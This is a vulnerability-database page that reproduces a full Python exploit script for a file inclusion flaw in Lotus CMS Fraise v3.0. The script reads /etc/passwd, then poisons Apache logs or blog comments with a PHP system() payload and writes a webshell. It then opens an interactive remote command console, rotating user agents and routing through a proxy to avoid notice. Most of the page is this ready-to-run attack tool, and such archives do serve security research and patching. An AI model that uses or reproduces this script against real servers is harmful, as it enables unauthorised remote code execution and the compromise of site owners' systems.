Vulners
Lucene search
Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit
#!/usr/bin/python
# Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit
# greetz Tecr0C :0)
#
# Vuln: lines 15-23 in core/lib/router.php
#---------- sof
# //Get page request (if any)
# $page = $this->getInputString("page", "index");
#
# //Get plugin request (if any)
# $plugin = $this->getInputString("system", "Page");
#
# //If there is a request for a plugin
# if(file_exists("core/plugs/".$plugin."Starter.php")){
# //Include Page fetcher
# include("core/plugs/".$plugin."Starter.php");
# --------- eof
#
# Additionally, the CMS allows an attacker to comment on blog posts which inturn will
# write a file on the remote disk with possibly 'malicious' content inside.
#
# exploit includes:
# - Proxy support
# - Dynamic User-agent generation
# - Apache access log and Lotus blog comment injection routines
# - Custom shell creation and deletion
#
# Environment:
# Apache 2.2.14/PHP 5.3.2
# php.ini -> magic_quotes_gpc = Off
#
# Example:
# [mr_me@pluto lotuscms]$ python luckylotus.py -c -i 1294585604 -p localhost:8080 -t 192.168.56.101 -d /webapps/lotus/lcms/
#
# | -------------------------------------------- |
# | Lotus CMS v3.0 Remote Code Execution Exploit |
# | by mr_me - net-ninja.net ------------------- |
#
# (+) Exploiting target @: 192.168.56.101/webapps/lotus/lcms/
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
# (+) Testing the file inclusion vulnerability.. file inclusion is working!
# (+) Writing comment.. comment shell written sucessfully
# (+) Writing webshell d8e8fca2dc0f896fd7cb4cb0031ba249.php to the webroot..
# (+) Entering interactive remote console (q for quit)
#
# [email protected]# id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# [email protected]# uname -a
# Linux steve-ubuntu 2.6.32-27-generic #49-Ubuntu SMP Wed Dec 1 23:52:12 UTC 2010 i686 GNU/Linux
#
# [email protected]# q
import sys, urllib, urllib2, socket, re, base64, getpass
from optparse import OptionParser
from random import choice
usage = "./%prog [<options>] -t [target] -d [directory path]"
usage += "\nExample 1: ./%prog -l -p localhost:8080 -t 192.168.56.101 -d /webapps/lotus/lcms/"
usage += "\nExample 2: ./%prog -c -i 1294585604 -p localhost:8080 -t 192.168.56.101 -d /webapps/lotus/lcms/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="dirPath",
help="Directory path to the CMS")
parser.add_option("-i", type="string", action="store", dest="blogPostId",
help="Blog Post ID that will be injected")
parser.add_option("-l", action="store_true", dest="logInject",
help="Code execution via apache access log")
parser.add_option("-c", action="store_true", dest="blogComInject",
help="Code execution via Blog comments")
(options, args) = parser.parse_args()
def banner():
print "\n\t| -------------------------------------------- |"
print "\t| Lotus CMS v3.0 Remote Code Execution Exploit |"
print "\t| by mr_me - net-ninja.net ------------------- |\n"
if len(sys.argv) < 5:
banner()
parser.print_help()
sys.exit(1)
# variables
exploit = "index.php?system="
dDS = "../" * 10
nB = "%00"
sName = "d8e8fca2dc0f896fd7cb4cb0031ba249"
phpShell = "<?php system(base64_decode($_GET[a]));?>"
cmd = "&a="
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Opera/8.00 (Windows NT 5.1; U; en)"]
agent = choice(agents)
def getProxy():
try:
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
except(socket.timeout):
print "\n(-) Proxy timed out"
sys.exit(1)
return proxy_handler
def getServerResponse(exploit):
if options.proxy:
try:
opener = urllib2.build_opener(getProxy())
opener.addheaders = [('User-agent', agent)]
check = opener.open(exploit).read()
except urllib2.HTTPError, error:
check = error.read()
pass
else:
try:
req = urllib2.Request(exploit)
req.addheaders = [('User-agent',agent)]
check = urllib2.urlopen(req).read()
except urllib2.HTTPError, error:
check = error.read()
pass
return check
def testFileInclusion():
sys.stdout.write("\n(+) Testing the file inclusion vulnerability.. ")
sys.stdout.flush()
testFile = "etc/passwd"
response = getServerResponse("http://" + options.target + options.dirPath + exploit + dDS + testFile + nB)
if re.findall("root:x:", response):
sys.stdout.write("file inclusion is working! \n")
sys.stdout.flush()
else:
sys.stdout.write("file inclusion failed..\n")
sys.stdout.flush()
print "(-) Exiting.."
sys.exit(1)
def writeDirtyLog():
sys.stdout.write("(+) Poisoning the access log.. ")
sys.stdout.flush()
su = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
su.connect((options.target,80))
except:
print "(-) Failed sending the shell to target %s" % options.target
junk = ("GET /hazStart"+phpShell+"hazEnd HTTP/1.1\r\nHost: "+options.target+"\r\nConnection: close\r\n\r\n")
su.send(junk)
su.close()
sys.stdout.write("log poisoned!\n")
sys.stdout.flush()
def huntLogFiles():
foundLogs = []
logs = ["var/log/httpd/access_log",
"var/log/httpd/error_log",
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"var/log/apache2/access.log",
"var/log/apache2/error.log",
"var/log/apache2/access_log",
"var/log/apache2/error_log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"etc/httpd/logs/acces_log",
"etc/httpd/logs/acces.log",
"etc/httpd/logs/error_log",
"etc/httpd/logs/error.log",
"var/www/logs/access_log",
"var/www/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/access.log",
"var/log/apache/access_log",
"var/log/apache/access.log",
"var/log/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"usr/local/apache/logs/error_log",
"usr/local/apache/logs/error.log",
"var/log/apache/error_log",
"var/log/apache/error.log",
"var/log/access_log",
"var/log/error_log"]
for log in logs:
response = getServerResponse("http://"+options.target + options.dirPath + exploit + dDS + log + nB)
if re.search("hazStart", response):
print ("(+) Log file found @ location: %s" % (log))
foundLogs.append(log)
return foundLogs
def writeLogWebShell(logFiles):
print ("(+) Writing webshell %s.php to the webroot.." % (sName))
cmd64 = base64.b64encode("echo \"<?php system(base64_decode(\$_GET['p'])); ?>\" > %s.php" % (sName))
for log in logFiles:
response = getServerResponse("http://"+options.target + options.dirPath + exploit + dDS + log + nB + cmd + cmd64)
def interactiveAttack():
print "(+) Entering interactive remote console (q for quit)\n"
hn = "%s@%s# " % (getpass.getuser(), options.target)
preBaseCmd = ""
while preBaseCmd != 'q':
preBaseCmd = raw_input(hn)
cmd64 = base64.b64encode(preBaseCmd)
cmdResp = getServerResponse("http://"+options.target + options.dirPath + sName + ".php?p=" + cmd64)
print cmdResp
# suicide
rmShell = base64.b64encode("rm %s.php" % (sName))
cmdResp = getServerResponse("http://"+options.target + options.dirPath + sName + ".php?p=" + rmShell)
def testProxy():
sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
sys.stdout.flush()
opener = urllib2.build_opener(getProxy())
try:
check = opener.open("http://www.google.com").read()
except:
check = 0
pass
if check >= 1:
sys.stdout.write("proxy is found to be working!")
sys.stdout.flush()
else:
print "proxy failed, exiting.."
sys.exit(1)
def writeDirtyComment():
sys.stdout.write("(+) Writing comment.. ")
sys.stdout.flush()
indexPage = "http://" + options.target + options.dirPath + "index.php"
if options.proxy:
try:
values = {'do' : 'comment', 'id' : options.blogPostId, 'name' : phpShell, 'website' : 'findme', 'message' : 'm'
, 'system' : 'Blog', 'post' : options.blogPostId }
data = urllib.urlencode(values)
proxyfier = urllib2.build_opener(getProxy())
proxyfier.addheaders = [('User-agent', agent)]
check = proxyfier.open(indexPage, data).read()
except:
print "(-) Proxy connection failed"
sys.exit(1)
else:
try:
values = {'do' : 'comment', 'id' : options.blogPostId, 'name' : phpShell, 'website' : 'findme', 'message' : 'm'
, 'system' : 'Blog', 'post' : options.blogPostId }
data = urllib.urlencode(values)
req = urllib2.Request(indexPage, data)
req.addheaders = [('User-agent',agent)]
check = urllib2.urlopen(req).read()
except:
print "(-) Target connection failed, check your address"
sys.exit(1)
sys.stdout.write("comment shell written sucessfully\n")
sys.stdout.flush()
def writeCommentWebShell():
print ("(+) Writing webshell %s.php to the webroot.." % (sName))
cmd64 = base64.b64encode("echo \"<?php system(base64_decode(\$_GET['p'])); ?>\" > %s.php" % (sName))
ws = "http://" + options.target + options.dirPath + exploit + "../../data/modules/Blog/data/comments/"
ws += options.blogPostId + ".txt" + nB + cmd + cmd64
response = getServerResponse(ws)
if __name__ == "__main__":
banner()
print "(+) Exploiting target @: %s" % (options.target+options.dirPath)
if options.proxy:
testProxy()
testFileInclusion()
if options.logInject:
writeDirtyLog()
dirtyLogs = huntLogFiles()
if dirtyLogs > 0:
writeLogWebShell(dirtyLogs)
else:
print "(-) No log files found working."
sys.exit(1)
elif options.blogComInject:
if options.blogPostId:
writeDirtyComment()
writeCommentWebShell()
else:
print "(-) Missing Blog Post ID value. See the example.. exiting.."
sys.exit(1)
else:
print "(-) Arguments not set correctly, see the example.. exiting.."
sys.exit(1)
interactiveAttack()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jan 2011 00:00Current
7.1High risk
Vulners AI Score7.1